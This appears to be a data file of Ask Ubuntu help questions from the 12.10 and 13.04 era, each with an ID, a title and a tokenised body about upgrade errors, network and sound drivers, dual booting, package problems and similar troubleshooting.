287753	problem when upgrading from 12.10 to 13.04	when upgrading to 13.04 from 12.10 during 'setting new software channels ' the following error message comes . w : failed to fetch http : //archive.canonical.com/ubuntu/dists/raring-backports/partner/source/sources 404 not found [ ip : 91.189.92.150 80 ] w : failed to fetch http : //archive.canonical.com/ubuntu/dists/raring-backports/partner/binary-i386/packages 404 not found [ ip : 91.189.92.150 80 ] e : some index files failed to download . they have been ignored , or old ones used instead . there were several more of the above type of messages . then it aborts upgrading . please help . thanks .
287754	partition size for dual boot with win 8 ( uefi ) and ubuntu ( latest desktop version )	if i create a partition on my hard drive for ubuntu so it can run alongside win 8 is it possible to alter the size of that partition later ? does the installation dvd for 13.04 come with a partition management facility so i can specify the size of the partition for ubuntu at first and then at some later date change the size of that partition . for example with my hard drive of about 630 gb i might at first want to operate on a 100 gb partition with ubuntu but then later increase its size to 250 gb .
287756	ca n't load some domain	i ca n't load some domain on my ubuntu 13.04 : youtube.com translate.google.com drive.google.com vk.com when i ping them they are responding : ping youtube.com ( 217.119.79.59 ) 56 ( 84 ) bytes of data . 64 bytes from non-registered.plix.pl ( 217.119.79.59 ) : icmp_req=1 ttl=59 time=21.9 ms 64 bytes from non-registered.plix.pl ( 217.119.79.59 ) : icmp_req=2 ttl=59 time=20.5 ms 64 bytes from non-registered.plix.pl ( 217.119.79.59 ) : icmp_req=3 ttl=59 time=21.3 ms -- - youtube.com ping statistics -- - 3 packets transmitted , 3 received , 0 % packet loss , time 2002ms rtt min/avg/max/mdev = 20.544/21.255/21.914/0.560 ms but they do n't load in any browser like firefox , chrome , lynx . they load in my media centre on xbmcbuntu .
287758	when i enter password to login , it returns login desktop inspite of correct password	how to login my ubuntu ? i want to login to my ubuntu desktop . when it is turned on and ask for enter password for specific user i add password keyboad and hit return key , but again it return login screen inspite of correct password . how to login to my desktop ? has the os crashed ?
287770	why is n't gksu in 13.04 ?	i do n't know if this is a bug or it 's their decision ? but why is n't it installed by default ?
287771	exact instructions for sending an sms via a wireless modem	what are the step-by-step and exact instructions for getting one of the following to send an sms via a huawei e398 or similar wireless modem ? this unit is 4g wireless with usb from the modem to the computer . wammu/gammu or ixconn or vodafone-mobile-connect-card-driver-for-linux or smslib please include all command lines necessary to research the parameter settings for the application . examples : lsusb and ls /dev and what to look for . note that the other three are apps but smslib is a java api . you can assume that java skills are available so that the only relevant problem is parameterization .
287778	fn key switches on and off , randomly	my f keys sometimes require the fn key to be used , and then later at a seemingly random time they do n't . for example guake sometimes requires me to hold fn + f12 to use it when normally its just f12 . when the fn key is required by the f keys , none of my volume buttons on the keyboard continue to work either . i have played around with the fn setting in bios but i did little to help . any ideas ?
287779	wired network is not stable in ubuntu 13.04 ( 64-bit )	i have installed ubuntu 13.04 ( 64-bit ) on my toshiba laptop ( c640 ) . i am terribly getting an issue regarding wired network 's stability . my system is behind a proxy server . the wired n/w gets disconnected frequently . then i have to physically disconnect and reconnect the ethernet cable to be able to connect to the network . in ubuntu 12.04.2 , this is not happening . i do n't know how to resolve this issue .
287783	integrating pidgin with online accounts	after upgrading from 12.04 lts to 12.10 , pidgin does not show in the message icon anymore in the tray . i found that the upgrade enabled empathy with a very old bunch of accounts . i would like to integrate pidgin with the new online accounts functionality instead . for a temporary solution i just set the tray icon whitlisting to all so pidgin has it 's own , advanced icon . gsettings set com.canonical.unity.panel systray-whitelist `` [ 'all ' ] '' that does not integrate it yet though . is there any reasonable way to do this ? like a pidgin plugin or ppa that does this with a branched off version ?
287786	how to install postgresql on ubuntu 13.04 ?	how to install postgresql in ubuntu 13.04 ? i followed by this tutorial , how to install postgresql 9-2 - ubuntugeek.com but in logs it says : the package is deprecated and no longer will be used so , what is the package name for the latest postgres ? keyring ? it does n't work if it is `` keyring '' .
287787	rebooting caused theme to look like windows 95 or gnome classic	my pc has recently received a fresh ubuntu 13.04 install . there is nothing else on the pc apart from a very basic setup of 13.04 . after rebooting , i noticed so many problems with the way ubuntu looked : mouse pointer very large , blurry applications do n't have a global menu bar font is all weird ... is it open sans instead of ubuntu ? right click context menu has little coloured icons in it most applications look like windows 95 i 've tried : unity-revamp unity -- reset changing the theme from ambiance and back again creating new user account ( looks ok in other account , but switching back is the same ) removing custom themes directories ( there were none at ~/.theme , ~/themes ) installing proprietary drivers ( this made everything much faster and smoother , but did n't fix the weird theme ) here 's some screenshots of what things look like now : can someone help my ubuntu get back to its beautiful self ?
287789	what is debootstrap -- second-stage for	i just played around with debootstrap and schroot . i 'm setting up my environments with debootstrap . i 'm not using -- second-stage option of debootstrap . when and how do i need to use this option . what does debootstrap do in the second stage ?
287790	blue error page timeout	blue error page timeout on ubuntu 1204 i can no longer connect to blue tooth devices . the devices are recognized but are not connected . the hci log says : hci sniffer - bluetooth packet analyzer ver 2.2 device : hci0 snap_len : 1028 filter : 0xffffffff 2013-04-29 12:55:35.071929 < hci command : inquiry ( 0x01|0x0001 ) plen 5 lap 0x9e8b33 len 8 num 0 2013-04-29 12:55:35.077811 > hci event : command status ( 0x0f ) plen 4 inquiry ( 0x01|0x0001 ) status 0x00 ncmd 1 2013-04-29 12:55:44.898920 < hci command : create connection ( 0x01|0x0005 ) plen 13 bdaddr 94:20:53 : * : * : * ptype 0xcc18 rswitch 0x01 clkoffset 0x0000 packet type : dm1 dm3 dm5 dh1 dh3 dh5 2013-04-29 12:55:44.903457 > hci event : command status ( 0x0f ) plen 4 create connection ( 0x01|0x0005 ) status 0x00 ncmd 1 2013-04-29 12:55:45.322095 > hci event : inquiry complete ( 0x01 ) plen 1 status 0x00 2013-04-29 12:55:50.026287 > hci event : connect complete ( 0x03 ) plen 11 status 0x04 handle 3839 bdaddr 94:20:53 : * : * : * type acl encrypt 0x00 error : page timeout the program did not generate a bug report . is there a solution to this problem ?
287792	not been able to shut down 13.04	after installing ubuntu 13.04 ( not upgrading to it , i did a `` clean install '' removing the older one ) , i 'm not been able to shutdown the system . after clicking the shut down button the desktop environment is terminated and the ubuntu splash screen blink on the screen and a error in a black sceen ( without the de ) just says the following : acpid : exiting speech-dispatcher disabled ; edit /etc/default/speech-dispatcher
287794	how to reenable networking ( wireless still not working ) ?	i installed kubuntu 12.04 few days ago on my new asus laptop . right after the installation wired connection was not detected , but wireless worked just fine . so , i was able to get the latest updates , and after that both wired and wireless worked ok . yesterday i just wanted to see what happens if i boot in a previous version of linux ( i have that option at boot ) , and it booted , but network was n't worked at all , neither wireless nor wired . the problem is now network is n't working even if i boot normally , the lastest version . i 'm a newbie in linux / ubuntu , so i do n't know what specific information should i provide more and how i find it , but i 'll try to do it if someone guide me .
287797	xserver-xorg-lts-quantal will remove many packages	i am try to install xserver-xorg-lts-quantal in ubuntu 12.04 . but it says installing xserver-xorg-lts-quantal will remove many packages . how to keep those packages ? thanks when i choose xserver-xorg-lts-quantal in synaptic , it gives : when i run in terminal , it gives : $ sudo apt-get install xserver-xorg-lts-quantal [ sudo ] password for xxxxxx : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libgl1-mesa-glx : depends : libglapi-mesa ( = 9.0.1-0ubuntu1~precise ) recommends : libgl1-mesa-dri ( > = 7.2 ) xserver-xorg-lts-quantal : recommends : libgl1-mesa-dri-lts-quantal but it is not going to be installed recommends : libgl1-mesa-glx-lts-quantal but it is not going to be installed recommends : xserver-xorg-video-all-lts-quantal but it is not going to be installed conflicts : libgl1-mesa-glx ( > = 0~ ) e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages .
287798	package operation failed while trying to install prozilla	i 'm a new ubuntu user and when i tried to install prozilla download manager at software center , i got package operation failed , and details are ... installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 217363 files and directories currently installed . ) unpacking prozilla ( from ... /prozilla_2.0.4~precisebuild1-0tahutek1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/prozilla_2.0.4~precisebuild1-0tahutek1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/share/locale/locale.alias ' , which is also in package locales 2.13+git20120306-3 no apport report written because maxreports is reached already errors were encountered while processing : /var/cache/apt/archives/prozilla_2.0.4~precisebuild1-0tahutek1_amd64.deb error in function : dpkg : dependency problems prevent configuration of apt-proz : apt-proz depends on prozilla ; however : package prozilla is not installed . dpkg : error processing apt-proz ( -- configure ) : dependency problems - leaving unconfigured please point me out how to fix it .
287803	ubuntu 12.04 not detecting windows 7 os during installation	i just bought a lenovo y500 and freshly installed windows 7-32 bit , which is working fine . now i am trying to install ubuntu 12.04 with dual boot . but it 's not detecting windows 7 and shows the whole disk as empty . boot info please help me . solution : followed the steps mentioned in here
287804	how can i fix my wpa-eap certificate problem ?	i 'm trying to connect my school 's wifi which has wpa-eap . everything else can connect to it except my ubuntu machine . i can connect on my htc one x android , os x , windows xp & 7 , and ios devices . so the problem seems to be about either mine or their certificate . i do n't really care if they have a valid certificate or not ( i 'll deal with that in another way ) . so if this certificate check can be disabled but i can connect , i 'm cool with it . in their own documentation for connecting , they mentioned no certificate from my side is needed . here 's my syslog . i 'm having ubuntu 13.04 64bit on a lenovo e135 laptop and some more info : alfred-nsh @ alfipad : ~/repos/flight-office $ lspci | grep network 02:00.0 network controller : broadcom corporation bcm43142 802.11b/g/n ( rev 01 ) alfred-nsh @ alfipad : ~/repos/flight-office $ uname -a linux alfipad 3.8.0-19-generic # 29-ubuntu smp wed apr 17 18:16:28 utc 2013 x86_64 x86_64 x86_64 gnu/linux i am using the propitiatory driver , but i do n't really have problem connecting to other networks .
287806	sound doesnt work , after installing gpu ubuntu 13.04	i had a radeon 4670 that i replaced , with an nvidea geforce gtx460 . now my sound does n't work . i figure it was a driver issue , so i installed the manufacturers recommended driver , but it still does n't work . what can i do to get audio working on my computer again ? here 's what lshw says about my audio device : # lshw ... *-multimedia description : audio device product : mcp61 high definition audio vendor : nvidia corporation physical id : 5 bus info : pci @ 0000:00:05.0 version : a2 width : 32 bits clock : 66mhz capabilities : pm msi ht bus_master cap_list configuration : driver=snd_hda_intel latency=0 maxlatency=5 mingnt=2 resources : irq:23 memory : fe028000-fe02bfff
287808	compiz eating all cpu	i 'm running raring ringtail 13.04 on a pc core 2 quad 3ghz with 4gb ram and after the latest round of updates compiz is using 40 % of processors capacity when idle . previously it was doing fine . running top shows compiz eating up all of the cpu . all other apps appear fine . does anyone have any ideas or experiencing the same issue ? i am using a video card nvidia 9800gt 1gb ram , using drivers nvidia .
287816	install packages ( vlc ) via usb	i want to install vlc to my ubuntu laptop , which has no connection to the internet . to work around this i want to download it to my windows machine , copy it to a usb drive and install on my ubuntu machine . how can i do this ?
287820	recover data lost during ubuntu installation	i have a drive of 250 gb which i had partitioned into two . 180 gb had a lot of music . it was my lifetime 's collection of music . the other 50 gb had windows installed in it and also had ubuntu 12.10 on it . now , i uninstalled ubuntu using wubi and now tried to install ubuntu 13.04 . i selected 7 gb of partition during the installation for ubuntu and 1 gb for swap data . i remember vividly when i was doing the partition , i selected the new partition table option and it showed me 250 gb . i re-partitioned it to 7 gb and added one more gb for swap data . after installing , i have lost the entire 250 gb of data . all my music and windows 7 also is gone . when i go to disks and check , there is a 242 gb of unallocated space shown . i really really want my data as it contains a lot of music and im a musician . i tried testdisk and it didnt recover anything . can you guys help ? i 'm desperate here .
287821	how can i install ubuntu 12.10 with a uefi boot ( win8 , without dvd driver ) ?	dual boot . i tried with a bootable usb , but my computer still went straight to windows 8 . then i followed the instruction on its website , tried with a windows-installer http : //www.ubuntu.com/download/desktop/install-ubuntu-with-windows but still unable to load ubuntu , \ubuntu\winboot\wubildr.mbr is there any way i could load ubuntu correctly ? i think something is wrong with my windows boot manager or something like this .
287823	viewing phone camera pictures from galaxy nexus smartphone	i am having problems viewing photos taken with my galaxy nexus phone . i am able to view other phone pics in ubuntu 13.04 easily , but this unit will not display them . it will display them in a computer with windows 7 , but not ubuntu . i have tried to install as many plug ins as possible from the software centre , but to no avail . phone has android version 4.1.2 in it . other phones tried are samsung galaxy pocket with android 2.3 , and samsung galaxy s2 with android 4.0.4. , with no problems . pc shows pics as a generic icon with details , but unable to resolve for view . thanking you in anticipation of your help in this matter .
287826	lost/deleted dpkg ( package manager for debian ) . how do i get it back ?	os : ubuntu 12.04 accidentally deleted dpkg . now , packages ca n't be installed . so , needs an dpkg installer which installs packages .
287833	screen suspend problem on ubuntu 13.04	i have got a problem with ubuntu 13.04 . i 've upgraded from ubuntu 12.10 to 13.04 recently and now my system hangs when waking from suspend .
287837	how do i install hp deskjet ink advantage 2510 all-in-one series ?	ubuntu 12.04 has the version 3.12.2-1ubuntu3.1 and http : //sourceforge.net/news/index.php ? group_id=149981 & limit=5 & offset=5 says that hp deskjet 2510 all-in-one series is supported in hplip version 3.12.6 . how do i get this printer working ?
287838	unable to update by sudo apt-get update in the terminal	john : ~ $ sudo apt-get update e : type 'ain ' is not known on line 3 in source list /etc/apt/sources.list.d/ferramroberto-filezilla-oneiric.list e : the list of sources could not be read . when i run sudo apt-get update command . ii get those things which are above . please help me in resolving this issue .
287841	no sound in ubuntu 13.04 i386	i have a machine running windows 7-ultimate 32-bit . i installed vmware workstation on it and ubuntu 13.04 i386 on that vmware . but on ubuntu i do n't hear any sound , any start up or movie or music sound . i have installed other oses on that vmware but no one has that sound problem .
287842	font alias for remote x server connection	i am connecting to remote server to launch an x application ( qmon ) . after i type ssh myserver -x and launch the application , i get the following error : warning : can not convert string `` -adobe-courier-medium-r-* -- 14-*-*-*-m-*-*-* '' to type fontstruct warning : can not convert string `` -adobe-courier-bold-r-* -- 14-*-*-*-m-*-*-* '' to type fontstruct warning : can not convert string `` -adobe-courier-medium-r-* -- 12-*-*-*-m-*-*-* '' to type fontstruct x error of failed request : badname ( named color or font does not exist ) major opcode of failed request : 45 ( x_openfont ) serial number of failed request : 386 current serial number in output stream : 397 i have the adobe-courier fonts installed on my desktop ( ubuntu ) : $ xlsfonts | grep adobe-courier -adobe-courier-bold-i-normal -- 0-0-0-0-p-0-iso8859-1 -adobe-courier-bold-i-normal -- 0-0-0-0-p-0-iso8859-15 -adobe-courier-bold-i-normal -- 0-0-0-0-p-0-iso8859-2 -adobe-courier-bold-o-normal -- 0-0-0-0-p-0-iso8859-1 -adobe-courier-bold-o-normal -- 0-0-0-0-p-0-iso8859-15 -adobe-courier-bold-o-normal -- 0-0-0-0-p-0-iso8859-2 -adobe-courier-bold-r-normal -- 0-0-0-0-p-0-iso8859-1 -adobe-courier-bold-r-normal -- 0-0-0-0-p-0-iso8859-15 -adobe-courier-bold-r-normal -- 0-0-0-0-p-0-iso8859-2 -adobe-courier-medium-i-normal -- 0-0-0-0-p-0-iso8859-1 -adobe-courier-medium-i-normal -- 0-0-0-0-p-0-iso8859-15 -adobe-courier-medium-i-normal -- 0-0-0-0-p-0-iso8859-2 -adobe-courier-medium-o-normal -- 0-0-0-0-p-0-iso8859-1 -adobe-courier-medium-o-normal -- 0-0-0-0-p-0-iso8859-15 -adobe-courier-medium-o-normal -- 0-0-0-0-p-0-iso8859-2 -adobe-courier-medium-r-normal -- 0-0-0-0-p-0-iso8859-1 -adobe-courier-medium-r-normal -- 0-0-0-0-p-0-iso8859-15 -adobe-courier-medium-r-normal -- 0-0-0-0-p-0-iso8859-2 i suppose that i have to create a copy of those files or an alias in /usr/share/fonts/x11/type1/fonts.alias file , but it is instructed there not to edit this file . update-fonts-alias does something slightly different than i want ( at least i think ) . how can i supply the missing fonts ? thank you !
287844	how can i install openstack grizzly using juju and maas ?	i 've noticed that the new release of ubuntu 13.04 includes deployment capabilities for openstack in an ha environment as well as integration of ceph for volume and object storage . i ca n't yet find a good walkthrough for it . i 'm assuming that this still applies : https : //help.ubuntu.com/community/ubuntucloudinfrastructure but are there differences ? how many network interfaces should each bare metal server that is in maas have ? i am currently using mirantis ' fuel to deploy openstack , but it does not yet support ceph in its automated deployment , which is why i would like to try out canonical 's solution .
287845	how to configure pkexec ?	reading these questions and answers : when to use pkexec vs. gksu/gksudo ? why is gksu no longer installed by default ? brought me another one that will create problems for new users of that command : how to configure pkexec for easy usage ? for example when doing the following : ( opening a file in terminal ) pkexec nano /etc/mysql/my.cnf ( opening a file in gui ) pkexec gedit /etc/mysql/my.cnf the last one gets the following error : pkexec must be setuid root now this brought me the following questions : how to configure pkexec to avoid getting this ? similar to how sudo/gksu behave when doing the same thing ( they only ask for the password ) . if applicable , how to tell it to not ask for a password after the first time applying it to a command ( or including the first command if configurable ) ? where to save the configuration file if not yet existing ? is there a gui app to configure pkexec usage ( policy kit ) ?
287847	messaging menu in 13.04 missing	i 've just updated to 13.04 this weekend ( a clean install via usb stick , as i usually do ) and since then i can not find the messaging menu working properly as it did before . it does n't integrate with online accounts and shows only the empathy statuses . i 've reinstalled and even downloaded a new iso file for another install , and everything remains the same . anyone facing the same problem ? ideas on how to solve it ? i 'm using a dell vostro 3500 , 64-bit ( dual-boot win 7 ) . thanks in advance .
287852	release upgrade notification after upgrade completed	i 've upgraded my ubuntu server to the 13.04 release . unfortunately during the upgrade process i lost the connection to the server and the server has n't completed correctly the upgrade to this release . the problem happened during the upgrade of the installed software and i 've fixed the problems related to apt-get upgrade running a shell suggested command to fix the problem and complete the upgrade of the system . the only problem that seems that i still have is the notification of an available release upgrade to version 13.04 that appear each time i login , but my ubuntu says that 's already at 13.04 as in displayed in this screenshot : how can i fix it ? could i consider the upgraded process completed safely ?
287854	where do i put java programs ( seleniumrc in my case )	i 've downloaded the package . the instruction say to unzip and place in your desired directory . what should that directory be ? nautilus is not letting me paste it into any /opt or /usr folders .
287855	poor wi-fi performance	here is the situation : ubuntu 13.04 , wireless adapter : intel pro/wireless 3945abg [ golan ] . wireless driver : iwl3945 . the problem is that wireless performance is less than satisfactory . i can connect to any wireless network without difficulty but the transfer speed is way worse than it should be . a quick test on speedtest.net shows that i get about half the speed i used to get with the same laptop in windows environment ( fyi the laptop had windows7 until last week and used to connect to the very same wireless network ) . furthermore ( like if that was n't enough.. ) , when copying files across the local network the speed is also far from pleasing ... much slower it used to be . as a result , streaming a media file stored on another computer or device on the network is impossible . as this is what i 'm primarily using this laptop for , it 's a real pain that i ca n't get it working correctly . what i 've done so far : i tried disabling hardware scan : modprobe -r iwl3945 modprobe iwl3945 disable_hw_scan=1 but this didn´t work so i didn´t bother making it permanent . i also tried replacing the network manager with wicd - did n't help at all . so what could it be ? here´s the output of lshw -c network : icefire @ toshiba : ~ $ sudo lshw -c network [ sudo ] password for icefire : *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 02 serial : 00:1e:33:5d:46 : ab size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk- napi duplex=half latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:44 ioport:4000 ( size=256 ) memory : d0010000-d0010fff memory : d0000000-d000ffff *-network description : wireless interface product : pro/wireless 3945abg [ golan ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 02 serial : 00:1f:3c : ae : d0 : ea width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwl3945 driverversion=3.8.0-19-generic firmware=15.32.2.9 ip=192.168.1.20 latency=0 link=yes multicast=yes wireless=ieee 802.11abg resources : irq:46 memory : d4200000-d4200fff here´s what iwconfig outputs : icefire @ toshiba : ~ $ iwconfig wlan0 ieee 802.11abg essid : '' dd-wrt '' mode : managed frequency:2.437 ghz access point : 00:26:5a : b1:62 : ee bit rate=54 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=61/70 signal level=-49 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:6 invalid misc:224 missed beacon:0 lo no wireless extensions . eth0 no wireless extensions . and ifconfig : icefire @ toshiba : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:1e:33:5d:46 : ab up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:554 errors:0 dropped:0 overruns:0 frame:0 tx packets:554 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:63267 ( 63.2 kb ) tx bytes:63267 ( 63.2 kb ) wlan0 link encap : ethernet hwaddr 00:1f:3c : ae : d0 : ea inet addr:192.168.1.20 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :21f:3cff : feae : d0ea/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:9773 errors:0 dropped:0 overruns:0 frame:0 tx packets:6310 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:10377083 ( 10.3 mb ) tx bytes:1143412 ( 1.1 mb )
287857	how to break the grub password ?	i am using ubuntu 12.10 . we all know that from the restore option in the grub menu we can reset our lost password . we can also put password for grub to prevent other users , to reset the password . my question is that , is there any way we can break/reset the grub menu password , so that i can know protection of my pc . bottom-line : how can we break/reset the grub menu password ? thank you .
287863	why is my perfomance too bad in virtual box ?	my cpu is i7 dual core . i am running ubuntu on virtualbox . it is extremely slow than other linux versions such as edubuntu 13.04 and its previous versions before 12.10 . the 12.10 was also very slow .
287864	how can i change the defaults in nautilus in ubuntu 13.04	it is now called `` file '' but i guess it is still really nautilus . the icons are a big too big for me , taking up too much real estate on the screen . i press zoom out and get a longer list . likewise i use view as list . i 'm used to the previous nautilus where it would remember that i switched the directory to display as list . it is n't a big deal , but it would be nice if `` file '' would remember my choice and next time come up with 1 zoom out and a list display . is there an easy way i can set the defaults ? thanks , ilan
287867	how do i copy to dvd my virtualbox windows data ?	i urgently need to make a backup before my hard-disk crashes . i realize this is an unusual request but i actually would be unhappy if my disk crashed . how can i burn a `` data files '' type of dvd from the windows virtual drive inside of virtualbox ? cdburnerxp can not see the dvd drive offered by virtualbox . in detail , within cdburnerxp the drop down box for the destination device does not list the dvd drive even though the virtualbox device menu has the dvd drive `` checked '' or selected for passing through to windows , although this might to be the same as the passthrough setting in machine , settings , storage . the error given by cdburnerxp is `` no burner selected '' and the drop down lists `` no compatible drives '' and there are no alternatives given . ( aside : i used cdburnerxp because windows 7 is incapable of deep tree disk burning because backups are an unusual an unimportant matter . i am on windows 8 but i am presuming that it continues to have the same problem . ) using windows file explorer which used to be called windows explorer there does not seem to be a dvd burning operation on offer . opening d drive , which is a blank dvd , fails since it 's not a windows file system , so there seems to be no way to drag a file into it ( nor copy-and-paste ) as a means of burning the disk . is there a way to use ubuntu to burn the windows virtual disk as `` data files '' ? i realize i could probably burn it as one big ext4 file but then i do n't know if i would be able to do a restore that would be compatible with the state of the virtual machine . furthermore , i would guess that a partial restore of selected windows data is out of the question . if i burn a big ext4 file that is the entire windows virtual machine folder , would that be compatible with meta-data elsewhere in the ubuntu file system ? edit : without anyway to backup individual windows files , i presume it is harmless to backup the whole virtual machine folder , nuke it , then restore the ext4 file into ubuntu but i would have to make an alternative backup before i would risk testing this . i will update if i have practical test results .
287871	updating to 13.04 failed in wubi install of ubuntu 12.10 . what should i do ?	i updated to 13.04 from a wubi install 12.04 updated to 12.10 a few days ago but something failed 75 % of the way through . i was able to cancel as i did n't understand the prompt . it said i was running 13.04 but articles like the user accounts were missing . upon reboot and now every time i get dual boot option . but hangs with ubuntu and wo n't boot . what are my options ? how do i uninstall it or fix it ? i do n't need anything saving from ubuntu . i 'm happy to wipe everything/ uninstall and try again . i just need windows untouched as its not my laptop .
287873	how to resolve these problems to install synaptic package manger in ubuntu 12.04 ?	e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
287875	how to limit the cpu usage for a process and its children wether there is another process demands resources or not	i was wondering about something like cpulimit to limit the process cpu usage but i am aiming to apply the same percentage of usage for its children processes too automatically without adding them manually in terminal by hand , so is there something limits the cpu usage for a process and its children whether there is or there is not another process needs the resources for the same time the first one uses it ? cgroup cpu.shares limits only when there is another process need the consumed resources by a previous process , what i am to is something like sudo cpulimit -p 1234 -l 20 so the limit here of cpu usage doesnt consider if there is another process or not demanding the used resources they apply it regardless of anything but my problem is that it applied on the parent process pid =1234 but its children no , so any suggestion pls ? i hope i explained my issue abundantly clear thanks in advance .
287876	finished install 13.04 on my mac but ca n't boot on it	after installing the ubuntu 13.04 on my macbook air ( with usb disk ) , i press my power key on my mac an hold on the `` option '' button an comes out only the `` macintosh hd '' and `` windows '' ( and i did n't setup any bootcamp on it ) . i think the problem is due to my wrong selecting of the boot guide , however i do n't know which disk to select .
287878	no wallpaper ubuntu 13.04	after upgrading my system ( ubuntu 13.04 64bit ) and restart the computer , my desktop wallpaper ran out , only appears a white background , someone could help me with this ?
287882	how to downgrade kernel image using usb stick ( live usb ) ?	is there a way to downgrade kernel on main ubuntu os using live usb ? thanx i read this : how to downgrade the kernel on 11.10 , but it seems i need to have access to the os , while in my case i can not enter the os so using live cd might be the only solution . thanx for your help
287883	ubuntu upgrade to 13.04 wo n't let me connect to wi-fi ( or to ethernet )	after upgrading my acer aspire 4810t to ubuntu to 13.04 32bit connection to any wi-fi ( or ethernet ) usually fails . sometimes , maybe once in five tries , rebooting may resolve the problem . contrary to some other related posts , the proximity of the wifi station does n't seem to have an impact on the problem . the wi-fi application indicator in the notification area at top bar of the screen keeps on entering and exiting and the whole system gets very slow . when i click any application indicator their menus often appear empty . running any program usually quickly freezes the whole system which makes searching the culprit from logs very challenging . my network card is : intel wifi link 5100 agn . the same laptop worked fine with previous ubuntu version and at the moment it works fine with windows vista . with virtualbox and windows vista as a host and 13.04 as a guest it works ok , though slowly . dmesg shows a long list of network-manager kills and respawns [ 33.224314 ] init : network-manager main process ( 862 ) killed by abrt signal [ 33.224361 ] init : network-manager main process ended , respawning [ 33.709347 ] init : network-manager main process ( 1307 ) killed by abrt signal [ 33.709393 ] init : network-manager main process ended , respawning apport-unpack shows that the networkmanager has crashed ( proccmdline and problemtype ) apport-unpack also shows warnings in wifisyslog /sys/devices/virtual/net/lo : could n't determine device driver ; ignoring.. trying to remove a non-existant call id . and hints for a firmware bug may 1 15:31:49 sauli-aspire-4810t kernel : [ 614.465977 ] atl1c 0000:01:00.0 : vpd r/w failed . this is likely a firmware bug on this device . contact the card vendor for a firmware update . any suggestions , where to start looking for the real problem and how to correct it ?
287885	unity does not get listed in lightdm on xubuntu 13.04	i 've installed xubuntu 13.04 beta2 and installed unity but it 's not getting listed in lightdm session list . any help ?
287886	memory card does not mount	i upgraded my os from 12.10 to 13.04 and i am not able to mount my memory card . snap shot of the error . i used to see eos_digital which is the name of memory card before clicking ok after i click ok i can not see the same any more . snap shot attached . below i edited /etc/modules and added this tifm_sd to the end of file . after rebooting i could see eos_digital . i tried to open and a pop up with error displayed as in first snapshot . i do not know how to overcome the error and access my memory card inserted to my laptop . edit : raghu @ raghu-vaio : ~ $ sudo fdisk -l [ sudo ] password for raghu : disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xdab78852 device boot start end blocks id system /dev/sda1 2048 26331135 13164544 27 hidden ntfs winre /dev/sda2 * 26331136 26535935 102400 7 hpfs/ntfs/exfat /dev/sda3 26535936 441143295 207303680 7 hpfs/ntfs/exfat /dev/sda4 441145342 1465145082 511999870+ f w95 ext 'd ( lba ) /dev/sda5 441145344 835999743 197427200 7 hpfs/ntfs/exfat /dev/sda6 836001792 1045714943 104856576 7 hpfs/ntfs/exfat /dev/sda7 1045716992 1255430143 104856576 7 hpfs/ntfs/exfat /dev/sda8 1255432192 1465145082 104856445+ 83 linux
287888	how to install apache/php from apt alongside mysql 5.6 from source	i managed to install mysql 5.6 on obuntu 12.10 but now i need apache/php packages but when i try to install them thorough apt they try to install mysql-common ( presumably 5.5 ) how to solve this ?
287889	how to use redatam ( statistics program ) with ubuntu , or recomend alternative	i use 12.04 lts and currently use redatam which is a windows-only statistics program . it does n't really work well with wine , so i 'm looking for an alternative . can you tell me if there is a similar program for linux ?
